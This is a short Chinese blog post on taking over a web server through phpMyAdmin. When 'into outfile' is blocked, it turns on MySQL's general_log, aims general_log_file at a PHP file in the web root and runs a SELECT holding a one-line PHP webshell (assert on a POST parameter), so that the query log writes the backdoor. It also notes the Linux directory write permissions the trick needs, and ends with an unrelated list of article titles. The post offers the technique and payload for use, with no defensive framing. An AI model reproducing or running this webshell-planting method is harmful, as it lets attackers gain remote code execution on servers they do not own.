phpmyadmin漏洞利用general_log和general_log_file拿权限
2024-08-26 13:30:35
我们如果知道phpmyadmin和网站的绝对路径后,可以利用into outfile写马拿到权限,但是吧有新版本的mysql和一些系统设置的问题这个函数受到了secure-file-priv这个的影响而且在linux上边必须有写 W的权限。。。这个得配置系统文件,在没有拿到权限的时候没法弄。。。
可以利用general_log和general_log_file
原理:开启general_log后,系统将mysql以后执行的每一条查询语句写入你指定的位置的文件里。而文件的位置则由general_log_file确定。我们可以开启这个选项后,SELECT '<?php assert($_POST["cmd"]);?>';,这个指令就把木马插入到你指定的php文件中去了。
操作:show variables like 'general_log';一般为OFF,我们可以在phpmyadmin上边执行操作:
LINUX就不像Windows了,必须是得给目录以及父目录设置W权限,这他妈就很扯了。。。除非管理员一开始就给了o的W权限,,否则没门,不过可以自己用linux试下权限。。。
最新文章
- dotnetnuke peek. glance.
- 财务比率:ROE, 净利润增长率、毛利率、市盈率、PEG
- 通过GitHub部署网站到Azure WebSite
- poj1637
- 统计"面"要素中"点"要素的个数.
- 高级爬虫工程师(Spider)-美团网-拉勾网-最专业的互联网招聘平台
- 怎么样sourceforge开源项目发现,centos安装-同htop安装案例
- vue环境搭建
- Redis的使用初探
- 搭建Sonar代码走查环境
- PAT (Basic Level) Practice (中文)1022 D进制的A+B
- Linux:文件系统层次结构标准(Filesystem Hierarchy Standard)
- [转]你可能不知道的五个强大HTML5 API
- sqlserver 中常见的函数字符串函数
- scp命令:服务器间远程复制代码
- vue获取dom元素注意问题
- 安装vue后报错 bash: vue: command not found
- MicrosoftFixit50688 [Windows7事件ID10,WMI错误的解决方法
- MySQL - CentOS 下 MySQL 5.6 安装
- Elasticsearch.Net 异常:[match] query doesn't support multiple fields, found [field] and [query]